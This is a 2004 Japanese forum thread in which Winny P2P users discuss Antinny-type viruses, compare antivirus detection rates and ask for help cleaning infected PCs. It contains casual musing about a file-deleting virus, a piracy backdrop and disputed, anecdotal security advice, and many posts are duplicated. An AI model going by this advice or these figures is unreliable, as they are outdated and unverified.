201 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
202 :[名無し]さん(bin+cue).rar:04/12/24 20:39:02 ID:qn0/HMWA
スレ違い。
スルーされるか叩かれるか、どっちがいい?
スルーされるか叩かれるか、どっちがいい?
203 :[名無し]さん(bin+cue).rar:04/12/24 20:52:49 ID:q/j6BqLC
>>201
大体、900MきっかりをDL・再生しようという気がわからん
大体、900MきっかりをDL・再生しようという気がわからん
204 :[名無し]さん(bin+cue).rar:04/12/24 21:20:21 ID:IcYjbT7V
あ、900Mきっかりとかのファイルは駄目なんすか。で、どーいった物なんでしょうか?
スレ違いですか
スレ違いですか
205 :[名無し]さん(bin+cue).rar:04/12/24 21:33:34 ID:yBS/40C8
206 :[名無し]さん(bin+cue).rar:04/12/24 21:34:01 ID:umwhgvRd
900Mきっかりの映像ファイルって怪しすぎw
そんなサイズ合わせるなんて普通できねぇよ(やり方あるかもしれんが
そんなサイズ合わせるなんて普通できねぇよ(やり方あるかもしれんが
207 :[名無し]さん(bin+cue).rar:04/12/24 22:24:19 ID:Ys7hADGH
俺が初めて知ったウイルスの発動日だな・・
208 :[名無し]さん(bin+cue).rar:04/12/25 00:08:38 ID:qn0/HMWA
おまいら、素敵なクリスマスプレゼントですよ。
【Winny】 ウィニー使用、違法コピー「ない」=捜査情報流出、巡査を訓戒−京都府警さん
ttp://news19.2ch.net/test/read.cgi/newsplus/1103898260/l50
【Winny】 ウィニー使用、違法コピー「ない」=捜査情報流出、巡査を訓戒−京都府警さん
ttp://news19.2ch.net/test/read.cgi/newsplus/1103898260/l50
209 :[名無し]さん(bin+cue).rar:04/12/25 00:10:22 ID:HL9yCcW6
>>208
もう頂いたw
もう頂いたw
210 :[名無し]さん(bin+cue).rar:04/12/25 00:38:09 ID:oenQiFk5
211 :[名無し]さん(bin+cue).rar:04/12/25 00:58:07 ID:8lgzYU/I
photoshop !!、photoshop !!
212 :[名無し]さん(bin+cue).rar:04/12/25 10:25:52 ID:Bw9C3mzK
んー、データ削除しても復元させるソフトってあったよなあ。
それやらんかったんかいな。甘くないか?
だんだんムカついてきたな。
それやらんかったんかいな。甘くないか?
だんだんムカついてきたな。
213 :[名無し]さん(bin+cue).rar:04/12/25 13:37:51 ID:BgAePOe7
そういうソフトでも復元できないように消去するソフトもあるだろ
214 :[名無し]さん(bin+cue).rar:04/12/25 13:40:03 ID:CgQ71/8o
データ復元は一発デフラグするだけでかなり復元確率落ちる
215 :[名無し]さん(bin+cue).rar:04/12/25 16:13:04 ID:tfS3Vts3
antinny系ウイルス検出数チェックしてみた
nyやここ等で入手したウイルスかもしれないもの57個
ウイルスバスター(o) 87.7%
Norton(o) 84.2%
F-Secure(o) 84.2%
NOD32 84.2%
Avast 82.5%
MCAfee(o) 80.7%
AVG 68.4%
ウイルスチェイサー(o) 68.4%
V3ウイルスブロック(Ahnlab.com)(o) 59.6%
AntiVir 59.6%
PandaActiveScan(o) 54.4%
BitDefender(o) 43.9%
etrast(o) 43.9%
ウイルスセキュリティ 36.8%
ウイルスプロテクターV4(haurijapan)(o) 33.3%
(o)…online scan
未知ウイルス検出がonだったりoffだったりするかも
nyやここ等で入手したウイルスかもしれないもの57個
ウイルスバスター(o) 87.7%
Norton(o) 84.2%
F-Secure(o) 84.2%
NOD32 84.2%
Avast 82.5%
MCAfee(o) 80.7%
AVG 68.4%
ウイルスチェイサー(o) 68.4%
V3ウイルスブロック(Ahnlab.com)(o) 59.6%
AntiVir 59.6%
PandaActiveScan(o) 54.4%
BitDefender(o) 43.9%
etrast(o) 43.9%
ウイルスセキュリティ 36.8%
ウイルスプロテクターV4(haurijapan)(o) 33.3%
(o)…online scan
未知ウイルス検出がonだったりoffだったりするかも
216 :[名無し]さん(bin+cue).rar:04/12/25 16:56:12 ID:yCRV07aa
げ、俺の36%
217 :[名無し]さん(bin+cue).rar:04/12/25 16:57:51 ID:j9nRL2/l
ウイルスバスターが一番か・・・
218 :[名無し]さん(bin+cue).rar:04/12/25 17:36:32 ID:OioStFZ6
俺、AVGユーザーだけど、antinny系で検出出来なかったことないぞ
ホントにテストしたのか?
ホントにテストしたのか?
219 :[名無し]さん(bin+cue).rar:04/12/25 17:54:10 ID:oenQiFk5
バスターの宣伝、ご苦労さん>社員
220 :[名無し]さん(bin+cue).rar:04/12/25 18:25:26 ID:3zAzB1/D
221 :[名無し]さん(bin+cue).rar:04/12/25 18:28:17 ID:HL9yCcW6
ウイルスバスターオンラインスキャンの俺は比較的安全だな。まあ常駐ソフトはウイルスセキュリティというry
222 :[名無し]さん(bin+cue).rar:04/12/25 18:42:44 ID:j9nRL2/l
ノートン重くてバスター2005に乗り換えた俺は勝ち(r
223 :[名無し]さん(bin+cue).rar:04/12/25 18:47:13 ID:hMuBUSKG
フリーで検出率が高いのはAvastか‥‥。
ちょっと試してみよう。
ちょっと試してみよう。
224 :[名無し]さん(bin+cue).rar:04/12/25 21:34:53 ID:3hhWbo+B
ネット自体に繋げなくなるウイルスなんてないですよね?
225 :[名無し]さん(bin+cue).rar:04/12/25 21:35:34 ID:/NV8iNg/
繋がりにくくなるのはあるな
226 :[名無し]さん(bin+cue).rar:04/12/25 22:53:39 ID:GORaclHz
みんな年賀状作ってるね。
住所録とか流れてるよ・・・
住所録とか流れてるよ・・・
Avast試してみたけれど、重いわメモリ食いだわで使うのやめた。
228 :[名無し]さん(bin+cue).rar:04/12/25 23:28:31 ID:+umQ9L8F
Win9xだろ
229 :[名無し]さん(bin+cue).rar:04/12/25 23:28:59 ID:aj4qHelN
マクロウィルスに注意。
office updateを定期的にしましょう。
office updateを定期的にしましょう。
230 :[名無し]さん(bin+cue).rar:04/12/26 09:48:06 ID:x4hb7P4C
あれ?exe偽造とかじゃなくてaviから感染するウィルスあるの?
231 :[名無し]さん(bin+cue).rar:04/12/26 13:20:02 ID:1TQZwM8w
>>230
たぶん各兆市が違うとかいう落ちでは?
たぶん各兆市が違うとかいう落ちでは?
232 :[名無し]さん(bin+cue).rar:04/12/26 13:21:55 ID:1TQZwM8w
sage忘れスマン
233 :[名無し]さん(bin+cue).rar:04/12/26 14:50:13 ID:dgnzLXzu
>230
aviの破損ファイルかダウソの途中で強制変換したファイルを再生しようとしとして
固まるのをウィルスと勘違いした池沼だろうよ。
aviの破損ファイルかダウソの途中で強制変換したファイルを再生しようとしとして
固まるのをウィルスと勘違いした池沼だろうよ。
234 :[名無し]さん(bin+cue).rar:04/12/27 01:46:03 ID:c/mn2YpK
あー感染した。それもキャッシュ消す奴。
うえwwwwwww
うえwwwwwww
235 :[名無し]さん(bin+cue).rar:04/12/27 08:05:16 ID:ZDsyvvRZ
Winnyを勝手にインストールするウイルス
ハッシュを勝手に登録するウイルス
OS起動時にpassを入れないとWinny関連を全部削除してしまうウイルス
定期的にpassを入れないと同上
こんなウイルスが出回ったら京都腐警も大困りですね。
ハッシュを勝手に登録するウイルス
OS起動時にpassを入れないとWinny関連を全部削除してしまうウイルス
定期的にpassを入れないと同上
こんなウイルスが出回ったら京都腐警も大困りですね。
236 :[名無し]さん(bin+cue).rar:04/12/27 08:06:46 ID:RNR4KhXp
その前に俺らが困るわ
237 :[名無し]さん(bin+cue).rar:04/12/27 08:15:19 ID:ZDsyvvRZ
もちろんpassは設定可能な
……batで書けそうなくらい簡単だな
……batで書けそうなくらい簡単だな
238 :[名無し]さん(bin+cue).rar:04/12/27 11:47:02 ID:ms3DZNK7
>218
おれはnyマシンはバスター、他のマシンにAVGだが
(DL完了時にバスターでチェック。他マシンから開くときにAVGでチェックが入る環境)
キンタマ系新種対応は明らかにAVGが早かった
その後のアップデートで対応する亜種が増えたのかも知れん
おれはnyマシンはバスター、他のマシンにAVGだが
(DL完了時にバスターでチェック。他マシンから開くときにAVGでチェックが入る環境)
キンタマ系新種対応は明らかにAVGが早かった
その後のアップデートで対応する亜種が増えたのかも知れん
239 :[名無し]さん(bin+cue).rar:04/12/27 11:53:01 ID:sdPY3Ev3
つーか、一位のバスターでさえ、antinny系で87.7%は低すぎだろ
ほんとにテストしたのか信用できないな
ほんとなら検体まとめてUPしてくれ。ここの皆でチェックしてやるよ
ほんとにテストしたのか信用できないな
ほんとなら検体まとめてUPしてくれ。ここの皆でチェックしてやるよ
240 :[名無し]さん(bin+cue).rar:04/12/27 12:01:42 ID:u/l2arRf
【使用OS】WinXP Home SP1
【WindowsUpdateしてるか】していますが、SP2はまだ導入していません。
【AntiVirusは】ノートン2003です。
【ちゃんとUpdateしてるか】ライセンスが切れており、かなり前からしていません。
【Winnyのバージョン】ny2β7.1です。
【Winny歴、総DL量は】一年ほど前から使っています。
【テンプレを読んだか】読みました。
【テンプレにある対策を実行したか】アイコンは変更していて、whiter対策にフォルダも作っていました。
【症状か具体的に、分かる限りすべて書く】
実行した瞬間、何かが動き出したような気がしたので焦って電源を切りました。
【何をしたらそんなことになったのか】
成年コミックの中に入っていたtxt.exeを間違えて実行してしまいました
【これまでにとった措置】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
電源を切ったままです。whiterの中には再起動時に実行されるものがあるとどこかで聞いたので怖くて起動できません。
この書き込みは家の中の別のパソコンから行っていますが、念の為、感染したと思われる自機のLANケーブルは抜いてあります。
感染しているかどうかを確認するためには起動させなきゃならない…とは思っているのですが、どのように起動するのが安全でしょうか?
【WindowsUpdateしてるか】していますが、SP2はまだ導入していません。
【AntiVirusは】ノートン2003です。
【ちゃんとUpdateしてるか】ライセンスが切れており、かなり前からしていません。
【Winnyのバージョン】ny2β7.1です。
【Winny歴、総DL量は】一年ほど前から使っています。
【テンプレを読んだか】読みました。
【テンプレにある対策を実行したか】アイコンは変更していて、whiter対策にフォルダも作っていました。
【症状か具体的に、分かる限りすべて書く】
実行した瞬間、何かが動き出したような気がしたので焦って電源を切りました。
【何をしたらそんなことになったのか】
成年コミックの中に入っていたtxt.exeを間違えて実行してしまいました
【これまでにとった措置】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
電源を切ったままです。whiterの中には再起動時に実行されるものがあるとどこかで聞いたので怖くて起動できません。
この書き込みは家の中の別のパソコンから行っていますが、念の為、感染したと思われる自機のLANケーブルは抜いてあります。
感染しているかどうかを確認するためには起動させなきゃならない…とは思っているのですが、どのように起動するのが安全でしょうか?
241 :[名無し]さん(bin+cue).rar:04/12/27 12:29:48 ID:D/pU/BY3
>>239
先月のPCJでもヤテタ。
バスターは亜種判定がぬるくなった(かつての誤検出の反省?)希ガス。
>>240
パターンアップしないアンチウイルスソフトは常駐するだけムダ(暴言)
「別のパソコン」にそのHDD繋いでチェック汁
先月のPCJでもヤテタ。
バスターは亜種判定がぬるくなった(かつての誤検出の反省?)希ガス。
>>240
パターンアップしないアンチウイルスソフトは常駐するだけムダ(暴言)
「別のパソコン」にそのHDD繋いでチェック汁
242 :[名無し]さん(bin+cue).rar:04/12/27 12:32:02 ID:sdPY3Ev3
>【ちゃんとUpdateしてるか】ライセンスが切れており、かなり前からしていません
自業自得だな。俺のお勧めは“KNOPPIX”っていうCDから起動できるLinuxを使う方法
FTPサイトから落とせるし、Linux系の雑誌の付録にもついてる
外付けHDDやCD-ROMでデーターを退避させてから、綺麗さっぱりフォーマットして
システム再構築。どーせ冬休みで暇なんでしょ。のーんびりがんばって。
自業自得だな。俺のお勧めは“KNOPPIX”っていうCDから起動できるLinuxを使う方法
FTPサイトから落とせるし、Linux系の雑誌の付録にもついてる
外付けHDDやCD-ROMでデーターを退避させてから、綺麗さっぱりフォーマットして
システム再構築。どーせ冬休みで暇なんでしょ。のーんびりがんばって。
>241
今回の事でやっとそれが自覚できました。
次からは購入するかAVGを導入します。
>242
自分、P2Pでウィルスに感染する時点でもう自業自得です。
Linuxから再構築という手もあるのですね。何かあったときに役立ちそうです。
ありがとうございます。
さっきはパニックになってしまい、ウィルスのファイルサイズなども確かめずに強制終了していました。
今セーフモードで再起動させてみたところ
・ファイルが消えた様子もなく、すんなりとWindowsが起動する
・ウイルスのサイズが1.26Mbである
・その他>9に挙げられた要素に共通するものが見られる
ということなので>9のAntinny.msのようです。
しかし、UpFolder.txtは書き換えられていませんでした。これはその動作を実行する前に電源を切ったからでしょうか?
とにかく、子、親を消去し、HOSTSを書き換えて念のためオンラインスキャンをしてみます。
どうもありがとうございました
今回の事でやっとそれが自覚できました。
次からは購入するかAVGを導入します。
>242
自分、P2Pでウィルスに感染する時点でもう自業自得です。
Linuxから再構築という手もあるのですね。何かあったときに役立ちそうです。
ありがとうございます。
さっきはパニックになってしまい、ウィルスのファイルサイズなども確かめずに強制終了していました。
今セーフモードで再起動させてみたところ
・ファイルが消えた様子もなく、すんなりとWindowsが起動する
・ウイルスのサイズが1.26Mbである
・その他>9に挙げられた要素に共通するものが見られる
ということなので>9のAntinny.msのようです。
しかし、UpFolder.txtは書き換えられていませんでした。これはその動作を実行する前に電源を切ったからでしょうか?
とにかく、子、親を消去し、HOSTSを書き換えて念のためオンラインスキャンをしてみます。
どうもありがとうございました
追記です。
>9ではsystemと書かれていますが、親、子が確認されたのはsystem32でした。
>9ではsystemと書かれていますが、親、子が確認されたのはsystem32でした。
245 :[名無し]さん(bin+cue).rar:04/12/27 13:51:14 ID:1kL4gIIk
winnyの仕様上、フォルダ情報にウイルス(キンタマ系)によって作られた不正なフォルダがない限り新種が出ても安全と言える?
246 :[名無し]さん(bin+cue).rar:04/12/27 14:21:15 ID:W1jIiZMJ
247 :[名無し]さん(bin+cue).rar:04/12/27 18:26:34 ID:OFGOwp+6
【使用OS】 XPsp2
【WindowsUpdateしてるか】 ○
【AntiVirusは】 アンチバー6
【ちゃんとUpdateしてるか】 ○ アップデートしたところウイルス反応でた
【スキャンした結果】 削除した
【オンラインスキャンしたならその結果は】 検出ファイル削除 その後もう一度OK
【Winnyのバージョン】 7.1
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
念のためノートンのお試し版いれたところ
ウイルス警告が出て (W32.HLLW.Antinny)
ファイルは自動的に削除されました。 の表示が
OKを押しても押しても出てくる。
レジストリのrunのとこにはara-keyは無かった
HDDアクセスしっぱなし。
【何をしたらそんなことになったのか】 アンチバーでOkだったので不覚にも
実行してたらしい。アンチバーアップデート後に検出された
【これまでにとった措置】
もう一度オンラインスキャンとノートンでスキャンしかし激重 現在もスキャン中
【WindowsUpdateしてるか】 ○
【AntiVirusは】 アンチバー6
【ちゃんとUpdateしてるか】 ○ アップデートしたところウイルス反応でた
【スキャンした結果】 削除した
【オンラインスキャンしたならその結果は】 検出ファイル削除 その後もう一度OK
【Winnyのバージョン】 7.1
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
念のためノートンのお試し版いれたところ
ウイルス警告が出て (W32.HLLW.Antinny)
ファイルは自動的に削除されました。 の表示が
OKを押しても押しても出てくる。
レジストリのrunのとこにはara-keyは無かった
HDDアクセスしっぱなし。
【何をしたらそんなことになったのか】 アンチバーでOkだったので不覚にも
実行してたらしい。アンチバーアップデート後に検出された
【これまでにとった措置】
もう一度オンラインスキャンとノートンでスキャンしかし激重 現在もスキャン中
248 :[名無し]さん(bin+cue).rar:04/12/27 18:44:02 ID:YD9MeNC6
アンチバーってなんだ? AntiVirのことか?
ここの対策を手順通りやってから、もう一度来たまい。
ttp://www.symantec.co.jp/region/jp/sarcj/data/w/w32.hllw.antinny.html
ここの対策を手順通りやってから、もう一度来たまい。
ttp://www.symantec.co.jp/region/jp/sarcj/data/w/w32.hllw.antinny.html
249 :[名無し]さん(bin+cue).rar:04/12/27 18:52:50 ID:Y7Ac5Rhe
昨日やたら動作が重くなったので、
身に覚えはないがウィルスにでも感染したかと思って確認してみたら、
WMPのリソースが解放されていなかった。
一昨日はMixerのリソースが解放されていなかった。
家電じゃありえないようなこういうこと、
いったい何十年後になったら無くなるんだろうか。
身に覚えはないがウィルスにでも感染したかと思って確認してみたら、
WMPのリソースが解放されていなかった。
一昨日はMixerのリソースが解放されていなかった。
家電じゃありえないようなこういうこと、
いったい何十年後になったら無くなるんだろうか。
250 :[名無し]さん(bin+cue).rar:04/12/27 18:54:35 ID:PLwTdcpL
家電って関係あるんだろうか・・・
251 :[名無し]さん(bin+cue).rar:04/12/27 19:08:07 ID:OFGOwp+6
>>248
レスサンクスです。 アンチバー そうですAntiVirです。
そこ読みました。レジストリのrunのところに
"ara-key" = "<ランダムにコピーされたファイル>" というのはありません。
あやしいのが
(既定) (値の設定なし) というのがあります。
あいかわらずファイルは自動的に削除されました。のウインドでっぱなし
OK押しても出てくる・・・・・。
レスサンクスです。 アンチバー そうですAntiVirです。
そこ読みました。レジストリのrunのところに
"ara-key" = "<ランダムにコピーされたファイル>" というのはありません。
あやしいのが
(既定) (値の設定なし) というのがあります。
あいかわらずファイルは自動的に削除されました。のウインドでっぱなし
OK押しても出てくる・・・・・。
252 :[名無し]さん(bin+cue).rar:04/12/27 19:10:08 ID:Gx77PFDn
無いな。
253 :215かもしれない人:04/12/27 20:35:33 ID:qAgIffJi
計算ミスがあったので修正
・ウイルスが2個だけ調べたのに計算結果に加えられてなかった
誤57 正59
その結果%も少し変化あり(±1%くらい)。順位はたいして変わらんが…。
・nodは1つ多めに計算してた。
以上
おまけ
計算ミスを修正してまとめたもの
ranobe.com 16958 pass:小林
・ウイルスが2個だけ調べたのに計算結果に加えられてなかった
誤57 正59
その結果%も少し変化あり(±1%くらい)。順位はたいして変わらんが…。
・nodは1つ多めに計算してた。
以上
おまけ
計算ミスを修正してまとめたもの
ranobe.com 16958 pass:小林
254 :[名無し]さん(bin+cue).rar:04/12/27 20:52:51 ID:nofb1fcE
ny起動時にUDPで何かするウイルス?に感染した1週間ぐらい前
UDPでアップもダウンもフィルターかけたけどこれは何?
UDPでアップもダウンもフィルターかけたけどこれは何?
255 :[名無し]さん(bin+cue).rar:04/12/27 21:00:14 ID:YD9MeNC6
発信元アプリ名は?
UDPポート番号は?
遮断後のログ情報は?
オンラインスキャン結果は?
テンプレ熟読後の対処結果は?
UDPポート番号は?
遮断後のログ情報は?
オンラインスキャン結果は?
テンプレ熟読後の対処結果は?
256 :[名無し]さん(bin+cue).rar:04/12/27 22:05:51 ID:nofb1fcE
スキャン結果なし 先生12月23日定義
発信winny?起動やめたらすぐ切断するから
起動中はずっとどこかに接続しようとする。
ポートは137や1036付近
ひょっとしたらnyきどうしているIPに送信してるかも。
対策はUDPを使用不能にしているのでなんともわからない。
実害は感じない。
発信winny?起動やめたらすぐ切断するから
起動中はずっとどこかに接続しようとする。
ポートは137や1036付近
ひょっとしたらnyきどうしているIPに送信してるかも。
対策はUDPを使用不能にしているのでなんともわからない。
実害は感じない。
257 :[名無し]さん(bin+cue).rar:04/12/28 00:41:41 ID:YrTe+fWx
>>256
> ポートは137や1036付近
トロイ踏んだヤツがnyノードにいて、そいつが叩くのがUDP 1036
137はNetBIOSの名前解決用
外部からなら平気だが、内部からのパケットを引っ掛けたのなら要注意
> ポートは137や1036付近
トロイ踏んだヤツがnyノードにいて、そいつが叩くのがUDP 1036
137はNetBIOSの名前解決用
外部からなら平気だが、内部からのパケットを引っ掛けたのなら要注意
258 :[名無し]さん(bin+cue).rar:04/12/28 01:07:13 ID:zcHPOIZ7
サンクス。
最初は外部からのパケットが掛かったけど
しばらくしたら内部からのパケットが出始めた。
OS再インスコしてみる。
その前に調べたほうがいいことあるかな?
UDPってストリーム配信ぐらいでnyには無関係かと思ってたけど。
それにしてもnyやるとウイルスとかネットワークとか勉強になる。
雑魚の俺でも一般人よりはわかるようになってきたよ。
最初は外部からのパケットが掛かったけど
しばらくしたら内部からのパケットが出始めた。
OS再インスコしてみる。
その前に調べたほうがいいことあるかな?
UDPってストリーム配信ぐらいでnyには無関係かと思ってたけど。
それにしてもnyやるとウイルスとかネットワークとか勉強になる。
雑魚の俺でも一般人よりはわかるようになってきたよ。
259 :[名無し]さん(bin+cue).rar:04/12/28 01:15:53 ID:TX62HmR1
てゆーかあれだな、痛い目みると
セキュ意識が高まるよな
セキュ意識が高まるよな
260 :[名無し]さん(bin+cue).rar:04/12/28 01:16:56 ID:ZjJn4HIK
UDP・・・・・・・・また変なのが出てきたか・・・・・。 orz
tcpしかない漏れには関係ないっぽいが、気をつけよう。
ところで、それは葱で見たのかな?
まあ、とにかく何落としててそうなったかわかんないからそっから佐賀さんと名。
まあ、そういうふうになったとき付近に落としたファイルのハッシュ器盆ぬ!
tcpしかない漏れには関係ないっぽいが、気をつけよう。
ところで、それは葱で見たのかな?
まあ、とにかく何落としててそうなったかわかんないからそっから佐賀さんと名。
まあ、そういうふうになったとき付近に落としたファイルのハッシュ器盆ぬ!
261 :[名無し]さん(bin+cue).rar:04/12/28 02:26:37 ID:W3Dt95Xu
ケロロ軍曹の付録ドラマCDのZip・・・。
ウイルスのしか流れてないのか・・。
262 :[名無し]さん(bin+cue).rar:04/12/28 06:28:55 ID:HVQ4WqJs
苺キンタマ感染キタ━━━━━━(゚∀゚)━━━━━━!!!!!
263 :[名無し]さん(bin+cue).rar:04/12/28 06:32:16 ID:YrTe+fWx
>>260
TCPしかないのに、よく通信できてるな(w。もうちょっと精進してくれ
トロイとかがバックドア仕掛けるのは、たいていUDPだぞ
ポートスキャンすると、TCP側閉じていても、UDP全開放なんてノードも多いし
ちなみに、137(UDP)は Bugbear, Msinit, Opaserv, Qazなどで、1036(UDP)はKWM あたりが使ってる
特にnyで伝播するものでもないし、何にはいってくるか分からん
TCPしかないのに、よく通信できてるな(w。もうちょっと精進してくれ
トロイとかがバックドア仕掛けるのは、たいていUDPだぞ
ポートスキャンすると、TCP側閉じていても、UDP全開放なんてノードも多いし
ちなみに、137(UDP)は Bugbear, Msinit, Opaserv, Qazなどで、1036(UDP)はKWM あたりが使ってる
特にnyで伝播するものでもないし、何にはいってくるか分からん
264 :[名無し]さん(bin+cue).rar:04/12/28 09:45:09 ID:S6MF6BJJ
265 :[名無し]さん(bin+cue).rar:04/12/28 10:20:20 ID:IPz8DxzV
266 :260:04/12/28 11:22:27 ID:ZjJn4HIK
267 :[名無し]さん(bin+cue).rar:04/12/28 11:27:38 ID:IztXeRxd
みんなすげーなー。
俺なんか、ウイルス感染して(強制再起動やアイコン消えまくり)
一応駆除はしたけど、未だに直せないでいるよ。
もうググりまくって、ログ読み漁ってるのにワケワカメ〜。
俺なんか、ウイルス感染して(強制再起動やアイコン消えまくり)
一応駆除はしたけど、未だに直せないでいるよ。
もうググりまくって、ログ読み漁ってるのにワケワカメ〜。
268 :[名無し]さん(bin+cue).rar:04/12/28 11:56:50 ID:ZEcr78g8
なんか、さっき変なもん間違ってDLしちまった…
アニメの名前が大量に書いてあるファイル、すぐに削除したけど、大丈夫だよな?
アニメの名前が大量に書いてあるファイル、すぐに削除したけど、大丈夫だよな?
269 :[名無し]さん(bin+cue).rar:04/12/28 12:03:32 ID:3Zr1m9Vr
あーあ。ご愁傷様w
270 :[名無し]さん(bin+cue).rar:04/12/28 12:04:05 ID:fKQz1Wxf
>268
おまえはゲロ吐いてるおっさんを見たら、貰いゲロするタイプなんだな
おまえはゲロ吐いてるおっさんを見たら、貰いゲロするタイプなんだな
271 :[名無し]さん(bin+cue).rar:04/12/28 12:05:33 ID:ZEcr78g8
えっと、やばいの?
272 :[名無し]さん(bin+cue).rar:04/12/28 12:13:01 ID:ReUuhJdL
(・∀・)コンニチハ! & (=人=)ナムナム
273 :[名無し]さん(bin+cue).rar:04/12/28 12:20:28 ID:ZEcr78g8
もうだめぽ…素人がこんなのに手をですもんじゃないね
OS入れ替えてくる
OS入れ替えてくる
274 :[名無し]さん(bin+cue).rar:04/12/28 12:39:59 ID:3MlISbR3
Ny専用マシン導入しろよ
275 :[名無し]さん(bin+cue).rar:04/12/28 12:42:00 ID:GoNJLw9Q
素人だけど大変なことになったことないな・・・
276 :[名無し]さん(bin+cue).rar:04/12/28 13:28:26 ID:IPz8DxzV
知らぬは本人ばかりなりだな。
277 :[名無し]さん(bin+cue).rar:04/12/28 16:59:16 ID:z9KZx7I+
ギャラクシ
感染者リストなんぞいう物が落っこちよった.
感染者リストなんぞいう物が落っこちよった.
278 :[名無し]さん(bin+cue).rar:04/12/28 17:45:42 ID:rzDGoOqS
Alpha-ROM解除ツールとかいうの実行したらDドライブ飛んだ。
何かガリガリいってる→裏でcmd.exeが走ってる→止める でなんとかなったっぽいけど。
今からRun周りをチェックしてくる。
何かガリガリいってる→裏でcmd.exeが走ってる→止める でなんとかなったっぽいけど。
今からRun周りをチェックしてくる。
279 :260:04/12/28 18:18:23 ID:ZjJn4HIK
csrssとvsmon.exeがばりばり動いてますが、他はnyぐらいか・・・・・。
>>275
ないとはいうものの、隠れてなんか動いてて、いきなりぞろ目になったら、
コニチハ!
ってな感じになったらプケラなのにな〜。
フフフフフ
>>275
ないとはいうものの、隠れてなんか動いてて、いきなりぞろ目になったら、
コニチハ!
ってな感じになったらプケラなのにな〜。
フフフフフ
280 :[名無し]さん(bin+cue).rar:04/12/28 19:18:36 ID:zcHPOIZ7
YAHOOはねえ、
ポートが開放しまくりのルータだから
導入はすごく楽なのよ。
だけど弾かれるし、セキュ甘いし
初心者を抜け出したところだから
ISP変えるよ、俺。
で、今のお勧めはどこよ?
スレチガイだけど
ポートが開放しまくりのルータだから
導入はすごく楽なのよ。
だけど弾かれるし、セキュ甘いし
初心者を抜け出したところだから
ISP変えるよ、俺。
で、今のお勧めはどこよ?
スレチガイだけど
281 :[名無し]さん(bin+cue).rar:04/12/28 20:53:38 ID:JxEsIWWc
282 :[名無し]さん(bin+cue).rar:04/12/29 22:29:31 ID:Vc/AO6nO
既出かもしれんが
トレンドマイクロのウイルスTOP5でANTINNY,Aが一位な件について
いまさらあんなウイルスが流行ってンのかよw
冬厨が原因か?w
トレンドマイクロのウイルスTOP5でANTINNY,Aが一位な件について
いまさらあんなウイルスが流行ってンのかよw
冬厨が原因か?w
283 :[名無し]さん(bin+cue).rar:04/12/29 22:31:44 ID:KRW2QOUY
>>282 がんがん来てるよ
284 :[名無し]さん(bin+cue).rar:04/12/29 23:45:58 ID:/7E+GN7j
AVGで調べたら感染ファイルがたくさん出てきました。
一応削除はして、これからCをリカバリしようと思います。
ただ、nyのファイルをDに置いていました。
Dもフォーマットしたほうがいいですか?
ダウンしたmpegファイルも全て削除したほうがいいですか?
(スキャンはしました)
一応削除はして、これからCをリカバリしようと思います。
ただ、nyのファイルをDに置いていました。
Dもフォーマットしたほうがいいですか?
ダウンしたmpegファイルも全て削除したほうがいいですか?
(スキャンはしました)
285 :[名無し]さん(bin+cue).rar:04/12/30 00:02:55 ID:KRW2QOUY
286 :[名無し]さん(bin+cue).rar:04/12/30 02:09:36 ID:DPwuo6p8
>>284
何に感染(というか自分で地雷を踏んだわけだが)したのか
不明な状況で、最高の安全策をとるなら
OSが認識している全ドライブ、およびネットワーク接続されたすべてのマシンのドライブ
を、フォーマットというかパーティションから切り直したほうがいい。スキャンしてOKと
いうのも安心できない。バックドア型トロイをふんずけて、AVGなどで検出されないタイプ
のウイルスを送り込まれてる可能性がある(たとえばHDDのブートセクタへの埋め込みモノなど)
拡張子が.mpg/.mpegのファイルで感染を広げるようなものは、今のところ確認されていないが
それをどこにバックアップするかによる。転送かけた時点で、送り先のデバイスが汚染されるかも
何に感染(というか自分で地雷を踏んだわけだが)したのか
不明な状況で、最高の安全策をとるなら
OSが認識している全ドライブ、およびネットワーク接続されたすべてのマシンのドライブ
を、フォーマットというかパーティションから切り直したほうがいい。スキャンしてOKと
いうのも安心できない。バックドア型トロイをふんずけて、AVGなどで検出されないタイプ
のウイルスを送り込まれてる可能性がある(たとえばHDDのブートセクタへの埋め込みモノなど)
拡張子が.mpg/.mpegのファイルで感染を広げるようなものは、今のところ確認されていないが
それをどこにバックアップするかによる。転送かけた時点で、送り先のデバイスが汚染されるかも
287 :[名無し]さん(bin+cue).rar:04/12/30 09:38:24 ID:mSJET0Rf
288 :[名無し]さん(bin+cue).rar:04/12/30 12:12:31 ID:unphhFKg
【使用OS】WinowXP SP2
【WindowsUpdateしてるか】はい
【スキャンした結果】はい
【オンラインスキャンしたならその結果は】Dd8.exeとTROJ_RBLAST.DLL発見
【AntiVirusは】今回の一件でしました
【ちゃんとUpdateしてるか】はい
【Winnyのバージョン】2.0b7.1
【Winny歴、総DL量は】長い
【テンプレを読んだか】はい
【テンプレにある対策を実行したか】はい
【症状か具体的に、分かる限りすべて書く】左クリックでフォルダを開けなくなった。
フォるダの上で左クリックすると、検索画面が出てしまう。
右クリックをしてみたら、『開く』ではなく『検索』が黒い太文字で一番上に存在し、
検索画面を開くことが最優先のアクションになっていた。
フォルダオプションの『ファイルの種類』を見たところ、フォルダを設定する欄が二つ、
同じフォルダのアイコンで『フォルダファイル』と『フォルダ』が存在していた。
『フォルダファイル』の詳細設定を見ると、動作の欄に『find』とのみが書かれていた。
これのせいだと思います。
しかし、この『フォルダファイル』をが消すことができません。『削除』のボタンが押せなくなっています。
とりあえず、『フォルダファイル』に『開く』の動作を新規で作って対応しているのですが、
フォルダオプションで設定していないにもかかわらず、新しいウィンドウを開いてしまうし…。
この、『ファイルの種類』から『フォルダ ファイル』を消す方法はありますか?
【何をしたらそんなことになったのか】寝ぼけて、間違えてフォルダアイコンのexeファイルを
クリックしてしまった。
【これまでにとった措置】ウイルスの削除をして感染の拡大の防止
【WindowsUpdateしてるか】はい
【スキャンした結果】はい
【オンラインスキャンしたならその結果は】Dd8.exeとTROJ_RBLAST.DLL発見
【AntiVirusは】今回の一件でしました
【ちゃんとUpdateしてるか】はい
【Winnyのバージョン】2.0b7.1
【Winny歴、総DL量は】長い
【テンプレを読んだか】はい
【テンプレにある対策を実行したか】はい
